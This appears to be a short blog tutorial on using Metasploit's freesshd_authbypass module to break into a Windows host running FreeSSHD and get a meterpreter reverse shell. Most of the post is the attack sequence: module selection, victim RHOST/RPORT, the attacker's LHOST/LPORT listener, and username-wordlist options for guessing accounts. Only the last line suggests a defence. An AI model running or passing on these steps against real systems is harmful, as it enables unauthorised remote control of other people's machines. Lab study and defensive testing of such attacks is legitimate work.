Top
JohnKlann / BackTrack  / Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

Kali Linux: Hacking FreeSSHD on Windows to get a meterpreter shell

So I found and interesting exploit in metasploit today mainly out of boredom and I figured I would share here. Below you will find a step my step of how to use metasploit to exploit FreeSSHD on windows to get a meterpreter shell.

start: FreeSSHD on your windows Victim box and check for any custom ports.

freesshd_configurations

freesshd_configurations

start: mfsconsole in kali

msfconsole

msfconsole

search: ssh

search_ssh

search_ssh

copy: exploit/windows/ssh/freesshd_authbypass

run: use exploit/windows/ssh/freesshd_authbypass

run: show options

use_exploit_options

use_exploit_options

run: set RHOST [victim ip]

run: set RPORT [victim port running ssh]

run: set LHOST [host ip]

run: set LPORT [local listening port]

exploit_settings

exploit_settings

run: exploit

exploit_shell

exploit_shell

Note: This exploit uses a user name list for the attack if the user that the ssh service uses to authenticate is not in this list this exploit won’t work. However there is an option you can set if you know the username or wish to guess at it.

ex: set USERNAME crazy_user123456789

Note: Also you can always find larger user name lists and add them to the list that metasploit uses located at “/opt/metasploit/apps/pro/msf3/data/wordlists/unix_users.txt” or you can change this path to point at your own list using the

ex: set USER_FILE /youpath/users.txt

Note: Kali of course has built in wordlist which you can find at the following location

ex: usr/share/dirbuster/wordlists/

Note: Once the exploit works you have a meterpreter shell :)

Solution if you are trying to protect against this attack, use a complicated username or use cygwin sshd for windows operating systems instead.

Submit your review
1
2
3
4
5
Submit
     
Cancel

Create your own review

Average rating:  
 0 reviews